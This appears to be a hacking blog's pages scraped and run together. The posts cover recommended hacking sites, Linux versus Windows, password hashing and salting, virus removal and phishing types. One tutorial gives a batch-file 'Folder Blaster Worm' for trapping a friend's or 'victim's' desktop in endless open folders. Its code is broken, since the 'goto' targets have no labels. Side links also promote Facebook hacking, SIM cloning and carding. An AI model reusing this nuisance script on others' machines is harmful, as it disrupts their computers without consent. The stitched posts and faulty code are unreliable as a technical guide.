10 Best Websites To Visit If You Want To Be A Hacker

10 Best Websites To Visit If You Want To Be A Hacker – Everybody wants to learn to hack in today’s age. However, this is not an easy task until you have basic knowledge about computers and network security. For beginners to know, there are two types of Hacking Ethical (White Hat) and Unethical (Black Hat). Unethical hacking is considered illegal while ethical hacking may be regarded as legal.

Also Read: Best ways to Hack Facebook

Where Can You Go For Being Taught How To Hack Like an Expert?

Hacking isn’t an individual subject that anyone can pick up overnight. This can’t be accomplished after reading one article and visiting a few of those websites – the phrase is used to show that in time and with a lot of practice, you’ll be able to, in fact, learn to hack like a pro.

For our many readers that are already at that expert-hacker level, a few of those sites may not be for you. They might feel too easy and necessary – for “Script-Kiddies” as some would possibly say. All of us needed to begin someplace, and these websites offered the starting point for these people just embarking down the wrote toward hackerdom.

Your intention for learning how to hack is completely your own. We don’t judge. , Though, note that there are two types of hacking – “white hat” and “black hat.” White hat hackers call themselves “ethical hackers,” during that they find vulnerabilities only to make systems and applications more secure for everyone. However, there’s an entire other community of hackers – the black hats – who find vulnerabilities only to exploit them as a lot as possible. Now you understand that what kind of community you may be entering.

Also Read: SMS Spoofing

So here HACKAGON will give you a list of websites that offers you white hat content. However, it is important to note that as a beginner to not do any hacking & cracking tactics that breach any cyber law.

10 Best Websites To Visit If You Want To Be A Hacker:

1# Hackaday

Hackaday is one of the best sites to learn hacking news and all kinds of tutorials for hacking and networks. It also publishes several latest articles each day with detailed description about hardware and software hacks so that beginners and hackers are aware of it. Hackaday also has a YouTube channel where it posts projects and how-to videos. It provides users mixed content like hardware hacking, signals, computer networks and etc. This site is helpful for hackers as well as for the people who are in the field of Digital Forensics and Security Research.

Also Read: Create Rogue Access Point For Attack In Kali Linux

2# Evilzone Forum

This hacking forum allows you see the discussion on hacking and cracking. However, you need to be a member on this site to check out queries and answers about ethical hacking. All you need to do is register to get your ID to get an answer for your queries there. Professional hackers will solve your queries. The Remember not to ask simple hacking tricks, the community people here are very serious.

Also Read: Uprooting Virus

3# HackThisSite

HackThisSite.org, commonly called HTS, is an online hacking and security website that gives you hacking news as well as hacking tutorials. It aims to give users with a way to learn and practice basic and advanced “hacking” skills through a series of challenges, in a safe and legal environment.

Also Read: Hashes

4# Break The Security

Name itself tells the motive of this website. Break The Security provides all kind of hacking stuff such as hacking news, hacking attacks and hacking tutorials. It also has a different kind of useful courses that can make you a certified hacker. This site is very helpful if you are looking to choose the security and field of hacking and cracking.

Also Read: XSS Attack

5# EC-Council – CEH Ethical Hacking Course

The International Council of Electronic Commerce Consultants (EC-Council) is a member-supported professional organization. The EC-Council is known primarily as a professional certification body. Its best-known certification is the Certified Ethical Hacker. CEH, which stands for Comprehensive Ethical Hacker provides complete ethical hacking and network security training courses to learn white hat hacking. To become a professional ethical hacker you just need to select the hacking course package and join to get trained. This site helps you to get all kinds of courses that make you a certified ethical hacker.

Also Read: How to do SIM Cloning

6# Hack In The Box

This is a popular website that provides security news and activities from the hacker underground. You can get huge hacking articles about Microsoft, Apple, Linux, Programming and much more. This site also has a forum community that allows users to discuss hacking tips.

Also Read: Latest Carding Dorks 2017

7# SecTools

As the name suggests, SecTools means security tools. This site is devoted to providing significant tricks about network security that you could learn to fight against the network security threats. It also offers security tools with detailed description about it.

8# Hacking Loops

Hacking Loops is one of the ethical hacking websites where you will get many articles on white hat hacking. Each article on this site seems to be absorbing, and I’m sure you too will. Some of the great posts on this site are “How to stop the virus or trojan attacks”, “Game Ranger hack for the range of Empires”, “Facebook smart status update tool”, and so on.

9# Explore Hacking

Explore Hacking is a site which wants the users to know the importance of information security. I think this website is great for the beginners. Because this site is very keen on providing the lower level to higher level hacking tutorials with fine screenshots. So, that’s the most useful key for the first level hackers to learn complicated hacking methods quickly.

10# Hacking Tutorial

Perfect English isn’t all the things. Hacking Tutorial is an example of when these writing skills of an author do not much relate to the quality of his/her technical information. That is the case over at Hacking Tutorial. Where the author offers an article related to “Client Side Attack Using the Adobe PDF Escape EXE Social Engineering”, “Exploiting MS11_003 Web Explorer Vulnerability”, and “Hacking Using BeeF XSS Framework”.

Also Read: Hack WPA2-PSK WiFi Password Using Linux


Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers’ expectations about 10 Best Websites To Visit If You Want To Be A Hacker. So, if you like this article then don’t forget to share it with your friends. And always feel free to drop a comment below if you have any query or feedback.

Why you should choose Linux over Microsoft

Linux over Microsoft: There’s never been a better time to give Linux a try.

Wait, don’t slam on that back button! I’m not one of those rabid “Year of the Linux desktop” types. Windows works just fine for hundreds of millions of people, and—sorry, Linux lovers—there’s little to suggest Linux usage will ever be more than a rounding error compared to Microsoft’s behemoth.

That said, there are some pretty compelling reasons you might want to consider switching to Linux on your computer or at least give it a hassle-free trial run.

Also Read: What Is Tor – How Does Tor Work – How to Use Tor?

1. Windows 10’s taking away your choices

Bear with me. This may seem off-topic, but it’s the crux of the issue for a lot of people. Linux’s most alluring feature for many won’t be anything that Linux actually does, but what it doesn’t do. And it’s all due to Microsoft’s folly.

 Windows 10 may be the best Windows ever (and I use it daily on my primary PC) but Microsoft’s pulled some tricks that range from questionable to downright gross to drive its adoption numbers higher and to coax you into using the myriad Microsoft services and paid upgrades baked into the operating system.

It began with endless pop-ups on Windows 7 and 8.1 PCs—pop-ups that started innocently enough before crossing the line into deceptive malware-like tactics. When that didn’t boost adoption numbers high enough, it morphed into nastier tricks and full-on forced upgrades that prompted some fearful owners to disable Windows updates completely and not be pushed into Microsoft’s new operating system.

 More recently, the Windows 10 Anniversary Update bundled some severe negatives in with its plentiful positives. The Cortona digital assistant, which pings Bing servers when you search your PC, is damned near impossible to disable completely now. And when I upgraded my primary PC to the Windows 10 AU, I discovered that all the settings related to the many ways Windows 10 pushes ads at you were re-enabled, after I’d explicitly disabled them earlier. None of my other system settings seem to have been touched. Yuck.
gwx new

LumpyMayoBNI via Reddit

Eventually, Microsoft began pushing Windows 10 out as a Recommended upgrade, forcibly installing it on some systems.

What’s more, Windows 10 changed the way it handles updates to more closely resemble mobile operating systems. You can’t pick and choose which patches to install, or even refuse updates on consumer operating systems. If Microsoft pushes a Windows 10 update, you will receive it eventually. The company also tweaked the way Windows 7 and 8 handle patching. Now, you can no longer choose which each update to install; you have to take the kit and caboodle.

By default, Windows 10 beams much more of your data back to Microsoft than previous Windows versions as well. Most of it can be disabled, but most people don’t dive that far into system settings.

Lots of people are still plenty happy with Windows 10, don’t get me wrong. But these moves are also ruffling the feathers of a lot of users. At the same time…

Also Read: Android L Will Keep Your Secrets Safer

2. Linux is more polished than ever

Most major Linux distributions never abandoned the basic principles of the desktop. While Microsoft enraged the world with the Windows 8 disaster, popular Linux distros like Fedora and Linux Mint kept their heads down and spit-polished the traditional PC interface.

linux mint

Linux Mint with the MATE desktop environment.

For people used to Windows XP and Windows 7, some Linux distros may be easier to wrap your head around than Windows 8 and 10—both of which have a learning curve, just like switching to Linux. Linux Mint’s “Start menu” bears much more similarity to the traditional Windows Start menus than Windows 10’s Live Tile-infused alternative, that’s for sure.

Better yet, Linux’s dark days of rampant incompatibility with PC hardware—especially networking and audio components—have largely been eradicated. Most Linux operating systems just plain work with a wide swathe of modern PCs and PC hardware, though you may need to do a few extra steps to install Linux on a PC with Intel’s Secure Boot enabled. Better yet, you can test Linux distros on your PC before actually installing them, so you’ll know whether everything works. We’ll get into that a bit later, though.

The key point, however, is that Linux is no longer a junky, broken mess useful only to dyed-in-the-wool geeks anymore. There are many polished, refined distros that anybody can pick up and use.

Also Read: Audio Tour App Detour Steers You Away from the Typical Tourist Traps

3. Open-source software is, too

The quality—or lack thereof—of open-source software was another longtime bugbear for Linux. No more. These days, Linux houses superb alternatives to all the most-used Windows software, from Office rivals (Libre Office) to Photoshop alternatives (GIMP) to media players (VLC). That trio alone covers the typical software usage of many households, and PCWorld’s guide to the best open-source software for everyday PC users features much more. Many top-notch video games even call Linux home now thanks to the arrival of Valve’s Linux-powered Steam Machines.

Playing copy-protected movies and music used to be another major Linux a headache. Once again, that’s no longer the case. VLC will run almost anything you throw at it, while Chrome (and Firefox soon) support streaming videos from the likes of Netflix and Amazon Instant Video.

netflix on linux

Chrome for Linux playing Netflix on Ubuntu. Oh, Archer, you’re so silly!

But standard PC usage for a lot of people revolves around the web—checking Facebook, slinging email, browsing YouTube and Amazon, et cetera. Naturally, those all work just fine on Chrome and Firefox in Linux. The browsers work the same as they do on Windows.

The modern Linux ecosystem can handle everything you throw at it, and handle it well (though hardcore gamers may still want to keep a copy of Windows handy). And did I mention most of the software available for Linux is free, too? Just like…

Also Read: How Internet Providers Get Around War Zones

4. Linux is free

Hey, it is. Not only does that make it relatively risk-free to try, but it also means you won’t need to spend $100 on a Windows license if you’re building a PC from scratch or upgrading an old computer.

Also Read: Let’s Build a Traditional City and Make a Profit

5. Linux runs great on old PCs

Windows XP was tossed to the wolves long ago, and Windows Vista’s end is rapidly drawing near. But hundreds of millions of people rely on PCs that are several years old. Installing Linux not only plops an up-to-date (and updated) operating system on your PC, it can breathe new life into your computer if you choose a lightweight distro designed for aging PCs, such as Puppy Linux or Lubuntu (a.k.a. “Lightweight Ubuntu”).

old pcs stock image

The transition doesn’t have to be painful, either. There are many easy Linux alternatives designed for Windows XP refugees. These distros offer dedicated “Windows XP Modes” that mimic the look and feel of Microsoft’s most venerable operating system.

Also Read: UK to allow driverless cars on public roads in January

6. Linux is easy to try

Okay, okay, I’ve sold you. You’re ready to test-drive Linux. Fortunately, Linux is dead simple to try. You don’t even have to ditch Windows if you’re feeling hesitant.

Before you install a Linux distro on your PC’s hard drive. I suggest giving your chosen operating system a whirl with a live drive or live DVD. With live drives, you install a bootable system of a Linux distro to a DVD or flash drive. Then configure your PC to boot from that and not your hard drive. It takes minimal muss and fuss. Lets you try several Linux operating systems quickly and doesn’t touch the Windows installation on your primary storage drive.

fedora live cd start

PCWorld’s tutorial on creating a bootable Linux flash drive can help you set one up. But which Linux operating system should you try? Our guide to the best Linux distros for beginners can guide your decision. Personally, I think Linux Mint provides the best experience for experimental Windows users. Because it mixes Ubuntu’s flexible approach to closed-source software with a Windows-like interface.

Using Linux shouldn’t be too much of a hassle, especially if you opt for an operating system with a Windows-like Start menu, but there are several core differences. Read our beginner’s guide to Linux to go in with both eyes open, and don’t be afraid to ask questions if you run into a problem. Most major Linux distros offer an online forum with dedicated help sections.

install ubuntu alongside windows

Installing Ubuntu Linux alongside Windows.

If you decide you like Linux, you can use the same live drive (or disc) to install your new operating system on your hard drive. You can keep Windows on your PC if you’d like, too. PCWorld’s guide to dual-booting Linux and Windows explains everything you need to know. And again, if you run into pesky Secure Boot errors while trying to install your Linux OS of choice, refer to our primer on installing Linux on PCs with Secure Boot.

See? That wasn’t so hard. If you’re running an older PC with limited hardware or a dead OS, or if you’re irked at some of Microsoft’s recent decisions around Windows 10. Then there’s no reason not to give Linux a try. You might just like what you find—especially if you spend most of your digital life in a browser and productivity suite.

So at least for once try Linux over Microsoft and tell us your experiences dealing with it 🙂



There are a lot of hurdles you will have to cross before you get to a point where you can call yourself a “Hacker” and so is Hashes. For one, everyone expects you to know everything to know about everything related to computers – Software, Hardware, networking and everything you can do with these three things (i.e. everything).

Speaking from experience, as one sets out for newer and bigger and more complicated hacks, often the biggest problems arises due to a weak foundation – lack of knowledge about a particular field. Hence, not only are you expected to know everything about Hacking and computers, but you are required for calling yourself a “Hacker”. Reason being, you might hit a roadblock, overcoming which could be quite simple but you wouldn’t know that since you’re not familiar with that field and end up spending hours on it. Forget thinking outside the box, start thinking in a whole new dimension.

With all that in mind, Here we discuss “Hashes”

A cryptographic hash function or algorithm is one that takes an arbitrary block of data and returns a fixed-length string (the hash), such that any (accidental or intentional) change to the data will (with very high probability) change the hash value. The data to be encoded are often called the message, and the hash value is sometimes called the ‘Message Digest’ or simply ‘Digest’.

In a nutshell, say we have this string “Hello”. We run it through a Hashing function and we get something like “kjadhs4as187d9dgh332g35g4”
This is the basic use of Hashing – Hiding Data. Obviously, no sane and sober person can decipher the original “Hello” from that weird string up above (Or can they? Read on…)

Ideal hash functions make it very difficult to get the original message back from the digest. It should be reasonably easy to compute a hash for a given message, infeasible to generate a message with a given hash or to change a message without changing the resultant hash. For practical reasons, we should never find two messages with the same hash. (Read that again)

While no completely ideal function exists, functions which aim for these properties can prove very useful. A classic example of cryptographic hash use is in the storage of passwords. When you sign up for a website, your data is usually stored in a database on servers. The issue is that if your password is stored on the server as regular text and if somebody hacks into the server, your password and everything it gave access to is gone. If your password is hashed on the server, however, an attacker shouldn’t be able to formulate your password from the stored value.

This concept may leave some wondering how a password entered at a later date could then be compared to the stored value to check if the login information is correct, but in fact, this is quite simple. You create an account, type in a password, the server hashes it and stores the digest. On the next login, the inputted password is simply hashed using the same function again, and this new digest is compared to that in the database – if they match, the inputs were the same and the user is allowed access to his/her account. Definitely, a more CPU intensive way to go, but it is what’s keeping our accounts safe.

Situations like this are also where the function property being “infeasible to find two messages with the same hash” becomes very important. If two values generate the same hash (these situations are called collisions, and are something that pretty much all hash functions are vulnerable to), somebody could input an incorrect password yet it could confirm as correct. Yes, you read that correctly!

And now! The million dollar question – How is it even possible to have an algorithm that can give a result which cannot be worked back from?

This really is the cornerstone of hash functions – especially as most secure algorithms are open source and available to the public. The most popular ones are called SHA1 and MD5 if you’re into programming go ahead and google them up to know more about them.

For those who don’t mind a little math, here’s a small example:

Take ‘4’ , Square it.
»16 , Take natural log.
»2.7725 , Multiply by pi.
»8.7103 , Take factorial (gamma function).
»189843.119 ***

Now ask a friend how is 189843.119 related to 4 and watch them laugh at your face. Chances are, even if s/he actually attempts to figure it out they may never get the answer. Meaning, you (the server) have successfully fooled your friend (the hacker). Only a metaphor. Of course, you (the server) can do the same with no problem because you know the exact functions. Just for a comparison, real Hashing functions are so complex even massive supercomputers may not be able to rework the original message from the digest.

The irreversibility isn’t actually as impossible as it might first sound – the tough bit comes in compromising this with all the other ideal properties. The trick is to split the message into a number of blocks, and then jumble them up and interact with each other to get some last seemingly random value pop out. Plus, they may contain not only apparent chaos but the real loss of information, say by cutting off decimal places or approximating large factorials. Meaning, there literally may not be anything related to the original message, not even enough information to actually trace back the message, even by the server hashing it in the first place. Further, a good hash function should produce totally different results if even a single character is changed. So, chop off one decimal place and the hash of “123password” might seem to become the one from “ladygaga” for example. Weird, right? (The function, not Lady Gaga XD) (P.S. – Alphabets or any characters can be literally converted into fixed numbers by taking their respective ASCII codes- which are simply some numbers assigned to every character on your keyboard.)

Rainbow Tables and Salting:

Hash functions are generally pretty strong, however, as always, a brute force attack is a way around the security. You may have heard of things called Rainbow Tables – These are essentially massive tables of Message-Digest pairs for a certain algorithm. Indirectly, a trade-off between time taking CPU power and memory storage. (Message-Digest the pair simply means, in this case, a possible password and the weird string it gives when to running through a hashing function)

For example, say a bunch of powerful computers has worked at generating message-digest pairs for an algorithm for a fair amount of time (a lot of combinations), and they’ve managed to list all the character combinations and associated hashes for up to 5 characters in message length with a known hashing function. If you’re running a website which simply hashes users passwords in a database with this popular (and presumably secure) algorithm, this means that if your users’ passwords aren’t very complex, they may already be listed in the rainbow table. So if an attacker breaks in, they could simply run all the hashes against the rainbow table, hence getting the original passwords for users with weaker passwords.

For example, say your database shows the association

user: JBsux
password: 9d4e1e23bd5b72

However, an entry for “9d4e1e23bd5b72” is found in the rainbow table through a quick search through, and the hash is translated back into the original password, say: “IsecretlyluvJB” and now, you’re screwed, in more than one way.

This is a pretty big problem – not only can users not really be trusted to come up with secure passwords a lot of the time, but popular algorithms are usually the more secure ones, however, this, in turn, means that more people will be interested in putting their CPU horsepower towards bettering the rainbow tables to break more hashes in that algorithm.

(Note: Rainbow tables are just a method to brute force and they suffer from the same weakness: Exponential growth. While most passwords up to 8 characters can be crammed into a reasonable 4 Terabyte hard disk, take it up to 12 characters and you’re looking at over 10 freaking Exabytes or 10 million Terabytes. Further, I got this figure by using the charset: {A-Z, a-z, 0-9} = I didn’t even consider symbols. Count those in and you literally cannot store the possible combinations on every storage device on the planet, combined. Oh, and did I mention that it might actually take even a supercomputer possibly hundreds of thousands of years to actually create that much data? And still, Rainbow tables are practical enough to deserve a mention here and they actually do work, Amazing isn’t it? The main reason being – Weak Passwords. (Surprisingly, “IsecretlyluvJB” at 14 characters long is actually pretty strong and the above example would be technically and practically correct only for a smaller password like “pass”))

Luckily, this problem isn’t too difficult to solve. Generating rainbow tables are only really practical for an amount of characters as the possible combinations of characters simply gets too high for a rainbow table to be generated for all the combinations practically. So to combat rainbow tables, all we really have to do is add a bunch of characters to the end of the password before we hash it, and we have a totally different hash which won’t be in the rainbow table. These extra characters are called salts. These are usually pretty big, around 10-20 or more characters and protect the naïve users who put in a 4 character password. The server may simply append the salt to the user inputted password and then hash it.

There’s one more important precaution that should be taken. Another example: Say, we own a site with millions of users. If we use the same salt for each user password, it’s probably worthwhile for attackers to go out of their way to actually generate a custom rainbow table for values with our salt attached to them! The solution to this is also very simple – use random salts. If salts are different for each user, there’s no way that an attacker can try to get all the passwords in the database, even with a lot of time and a lot of storage memory whereas for the server, it can simply store the username and password hash along with the randomly generated salt and use it again when the user enters the password for logging in.

If attackers wanted to target a specific user, of course, they could waste a whole bunch of time trying to generate a rainbow table specifically for that salt, however, if the user has a strong password it will simply take too long as there are way too many character combinations that the password could contain.

In conclusion, Hashes are today’s way of encrypting (mostly) passwords. A great invention, they are here to stay for a while but like every security system, they are flawed. There’s only so much a company and their servers can do to make sure their users are kept safe, in the end, it’s up to the users to look out for themselves. The annoying websites which keep the passwords to contain say, A capital letter + A number + A symbol, are in fact the most secure. Whereas the ones who accept 4 character length passwords, although convenient are also the most insecure, Hence it’s up to the user to keep themselves safe.

A peek into the world to come tells us passwords themselves will become obsolete in the not so distant future. With BioMetrics already rising up in the world of security. Fingerprint and Retina Scanners, Handwriting and Facial Recognition software etc. mark the beginning of the next big step in the field of cyber safety. Further with the advent of the so-called “Quantum Computers” just beyond the horizon, each of us will have access to CPU’s dozens, perhaps hundreds of times faster than the ones on the market. The billion year long brute force attacks might soon take as little as a few seconds. Breathe a sigh of relief, quantum computing is mostly theoretical for the time being and is just about as real as light sabers in star wars (They are at little glow sticks as compared to light sabers). Right now, we can let them be our grandchildren’s headache

Rewinding to the present, passwords are here to stay (for the near future at least), and so are Hashes. Luckily for us, the hackers, this provides us with just another loophole to exploit.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about Hashes. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Uprooting Virus

A computer virus is a malicious software (also known as “Malware”) that can copy itself and infect other software or files on your computer. If you suspect your computer has been infected, then several antivirus websites provide step-by-step instructions for removing viruses and other malware. So let’s see the procedure of Uprooting Virus.

How to remove and avoid computer viruses?

Fortunately, if you update your computer and use free antivirus software such as AVG, you can help permanently remove unwanted software and prevent installation in the first place.

How do I know if my computer has been infected?

After you open and run an infected program or attachment on your computer, you might not realize that you’ve introduced a virus until you notice something isn’t quite right. Here are a few indicators that your computer might be infected:

  • Your computer runs more slowly than normal.
  • Your computer stops responding or freezes often.
  • Your computer crashes and restarts every few minutes.
  • Your computer restarts on its own and then fails to run normally.
  • Applications on your computer don’t work correctly.
  • Disks or disk drives are inaccessible.
  • You can’t print correctly.
  • You see unusual error messages.
  • You see distorted menus and dialog boxes.

These are common signs of infection — but they might also indicate hardware or software problems that have nothing to do with a virus. Unless you run some kind of Malicious Software Removal Tool and install industry-standard, up-to-date antivirus software on your computer, there is no way to be certain if your computer is infected with a virus or not. Beware of messages warning that you’ve sent in the email that contained a virus. This can indicate that the virus has listed your email address as the sender of the tainted email. This does not necessarily mean you have a virus. Some viruses have the ability to forge email addresses. In addition, there is a category of malware called Rogue Security software that works by causing fake virus alerts to pop up on your computer.

How to install updates and also the antivirus software if you can’t use your computer?

It might be difficult to download tools or update your computer if your computer has a virus. In this case, you can try one of the following options:

  • Use another computer to download the tools to a disk.
  • Get help through your Antivirus’s website support.
  • Have your system checked by a Technician

How can I prevent infection by computer viruses?

Nothing can guarantee the security of your computer, but there’s a lot you can do to help lower the chances that you’ll get a virus.
It’s crucial to keep your antivirus software updated with the latest updates (usually called definition files) that help the tool identify and remove the latest threats. You can continue to improve your computer’s security and decrease the possibility of infection by using a firewall, keeping your computer up to date, maintaining a current antivirus software subscription, and following a few best practices.

Tip: Because no security method is guaranteed, it’s important to back up critical files on a regular basis.

We hope that HACKAGON matched our reader’s expectations about Uprooting Virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Annoy your Friend/Victim with your own Folder Blaster Worm.

Folder Blaster Worm

What Is A Folder Blaster Worm?

Folder Blaster Worm is a batch file that opens up the bunch of applications all at once but it doesn’t allow you to close them.

How Does The Folder Blaster Worm Work?

The logic behind Folder Blaster is to create and open a lot of folders with an infinite loop and the best part of this folder blaster is that it disallow the victims from closing the generated folders.

How Do You Create A Folder Blaster Worm?

  1. Begin with opening up a new text file and turning off echo by typing “@echo off”.
  2. Then change the directory to Desktop by typing “cd ./Desktop”.
  3. Now create 10 folders with names 0-9 by typing “md 0”, “md 1” and so on.
  4. Now type anything after a colon, for example, :confirm. You then set up a label.
  5. Now start opening up all the 10 folders by typing “start 0”, “start 1” and so on. Now the final statement causes an infinite loop by typing “goto” and the words you typed in earlier, for example, goto confirm.

What Countermeasures Should We Take?

Unfortunately, there aren’t any countermeasures that someone can take to prevent this from happening to them but luckily this isn’t a deadly worm, it won’t cause your computer to crash, it’s merely an annoying trick. On the upside, it is an easy fix if it happens to you. All that needs to be done is for you to go to your task manager and end the task of the CMD file.

Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient Microsoft OS). These DOS (Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI).

Start “Run”, or simply hit [Windows key + R]. Type “cmd”, and you’re presented with the CLI. You can type “help” to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user-friendly every day, CLIs are being replaced by GUIs (Graphical User Interfaces) – meaning in most places you won’t have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, especially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI. So, Before getting to the code, let’s take a look at a couple of commands.

md / mkdir:  Make Directory, This command is used to create a directory (a folder).

cd:  Change Directory, This command is used to change the current directory.

Here we’ve got the Folder Blaster Worm. Again, this one’s fairly easy to understand. What we’re doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash.

@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto confirm

So, we beginning with turning off echo. Then we changed the directory to Desktop. Now we created ten folders with names 0-9. We set up the label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.

The above code can be made much shorter with the use of LOOPs, as discussed below. We’ll start by creating a variable and setting its value to 0. We are going to use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first:

@echo off
set /a i=0
if %i%==10 goto end
echo This is iteration %i%.
set /a i=%i%+1
goto loop

Where “set” is used to define and initialize a variable. Here we create a variable called “i” and set it’s value to zero. After setting up a label, we check if the value of the variable “i” (given by %i%) is equal to 10, and if it is we “goto” the label end (the program ends when this happens). Now we “echo” (send a message) to notify the user which iteration is currently running. In the next step, we increment the value of “i” by one and then go back to the “if” statement.

So the loop runs ten times (0-9) and then stops. The above was not a worm, but a simple program. Earlier, I told you that the above Folder Blaster worm code can be made shorter by using loops. You know how to make the worm, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker.

(HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop & in the end don’t forget to save the file in .bat extension. )

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best worm/virus to have fun with your Friend’s/Victim. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

History says that Phishing Attacks are one of the most common security challenges that both individuals and companies face in keeping their information secure. You should always be careful about giving out personal information over the Internet. Luckily, companies have begun to employ tactics to fight against phishers, but they cannot fully protect you on their own. Remember that you may be targeted almost anywhere online, so always keep an eye out for those “Phishy” schemes and never feel pressurize to give up personal information online.


What Is Phishing ?

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

Communications purporting to be from popular social websites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware etc. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.

Different Types Of Phishing Techniques:

1# Spear Phishing: Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is, by far, the most successful on the internet today, accounting for 91% of attacks.

2# Clone Phishing: A type of phishing attack whereby a legitimate, and previously delivered, the email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.

3# Whaling: Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks. In the case of whaling, the masquerading web page/email will take a more serious executive-level form. The content will be crafted to target an upper manager and the person’s role in the company. The content of a whaling attack email is often written as a legal subpoena, customer complaint, or executive issue. Whaling scam emails are designed to masquerade as a critical business email, sent from a legitimate business authority. The content is meant to be tailored for upper management, and usually involves some kind of falsified company-wide concern. Whaling phishers have also forged official-looking FBI subpoena emails and claimed that the manager needs to click a link and install special software to view the subpoena.

4# Link Manipulation: Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are the common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually, this URL points to the “yourbank” (i.e. phishing) section of the example website. Another common trick is to make the displayed text for a link (the text between the <A> tags) suggest a reliable destination when the link actually goes to the phishers’ site. Many email clients or web browsers will show previews of where a link will take the user to the bottom left of the screen while hovering the mouse cursor over a link. This behavior, however, may in some circumstances be overridden by the phisher.

5# Filter Evasion: Phishers have even started using images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. However, this has led to the evolution of more sophisticated anti-phishing filters that are able to recover hidden text in images. These filters use OCR (Optical Character Recognition) to optically scan the image and filter it. Some anti-phishing filters have even used IWR (Intelligent Word Recognition), which is not meant to completely replace OCR, but these filters can even detect cursive, hand-written, rotated (including upside-down text), or distorted (such as made wavy, stretched vertically or laterally, or in different directions) text, as well as text on colored backgrounds.

6# Website Forgery: Once a victim visits the phishing website, the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar or by closing the original bar and opening up a new one with the legitimate URL.

An attacker can even use flaws in a trusted website’s own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic because they direct the user to sign in at their bank or service’s own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.

A Universal Man-In-The-Middle (MITM) Phishing Kit, discovered in 2007, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.

To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites (a technique known as “Phlashing”). These look much like the real website but hide the text in a multimedia object.

7# Covert Redirect: Covert Redirect is a subtle method to perform phishing attacks that make links appear legitimate, but actually redirect a victim to an attacker’s website. The flaw is usually masqueraded under a login popup based on an affected site’s domain. It can affect OAuth 2.0 and OpenID based on well-known exploit parameters as well. This often makes use of Open Redirect and XSS vulnerabilities in the third-party application websites.

Normal phishing attempts can be easy to spot because the malicious page’s URL will usually be different from the real site link. For Covert Redirect, an attacker could use a real website instead by corrupting the site with a malicious login popup dialogue box. This makes Covert Redirect different from others.

8# Phone Phishing: Not all phishing attacks require a fake website. Messages that claimed to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) was dialed, prompts told users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

9# Tabnabbing: This technique takes advantage of tabbed browsing, with multiple open tabs. This method silently redirects the user to the affected site. This technique operates in reverse to most phishing techniques in that it doesn’t directly take you to the fraudulent site, but instead loads their fake page in one of your open tabs.

10# Evil Twins: This is a phishing technique that is hard to detect. A phisher creates a fake wireless network that looks similar to a legitimate public network that may be found in public places such as airports, hotels or coffee shops. Whenever someone logs on to the bogus network, fraudsters try to capture their passwords and/or credit card information.

Precautions Against Phishing:

  1. Guard Against Spam: Be especially cautious of emails that Come from unrecognized senders and ask you to confirm personal or financial information over the Internet and/or make urgent requests for this information.
  2. Communicate personal information only via phone or secure websites. In fact, When conducting online transactions, look for a sign that the site is secure such as a lock icon on the browser’s status bar or a “https:” URL whereby the “s” stands for “secure” rather than an “http:”.
